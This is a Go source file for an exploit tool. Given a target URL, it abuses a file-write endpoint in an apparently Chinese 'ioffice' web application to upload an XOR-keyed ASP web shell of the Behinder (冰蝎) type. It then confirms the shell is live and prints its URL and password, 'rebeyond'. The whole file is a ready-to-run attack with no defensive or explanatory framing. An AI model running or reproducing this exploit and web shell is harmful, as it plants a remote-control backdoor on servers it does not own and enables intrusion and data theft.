package main
import (
"crypto/tls"
"fmt"
"github.com/hpifu/go-kit/hflag"
"github.com/imroc/req/v3"
"github.com/liushuochen/gotable"
"github.com/thanhpk/randstr"
"log"
"net/http"
"os"
"strings"
"time"
)
func main() {
now := time.Now()
param := getParam()
uploader(param)
fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", time.Since(now).String())
}
func getParam() string {
hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t"))
if err := hflag.Parse(); err != nil {
fmt.Println(hflag.Usage())
os.Exit(0)
}
return hflag.GetString("target")
}
func reqClient() *req.Client {
cli := req.C()
cli.SetAutoDecodeAllContentType()
cli.SetRedirectPolicy(req.NoRedirectPolicy())
cli.SetTimeout(time.Second * 15)
cli.SetTLSFingerprintSafari()
cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true,
MinVersion: tls.VersionTLS10,
MaxVersion: tls.VersionTLS13}
return cli
}
func uploader(target string) {
shellName := randstr.Hex(8) + ".asp"
shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n"
vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1)
client := reqClient()
post, err := client.R().SetBody(shellString).Post(vulUrl)
if err != nil {
log.Println(err)
return
}
defer func() {
_ = post.Body.Close()
}()
if post.StatusCode != http.StatusOK {
fmt.Println("GetShell Failed")
return
}
shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1)
get, _ := client.R().Get(shellURL)
if get.StatusCode != http.StatusNotFound {
create, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
_ = create.AddRow([]string{
"冰蝎", shellURL, "rebeyond",
})
fmt.Println(create)
}
defer func() {
_ = get.Body.Close()
}()
}
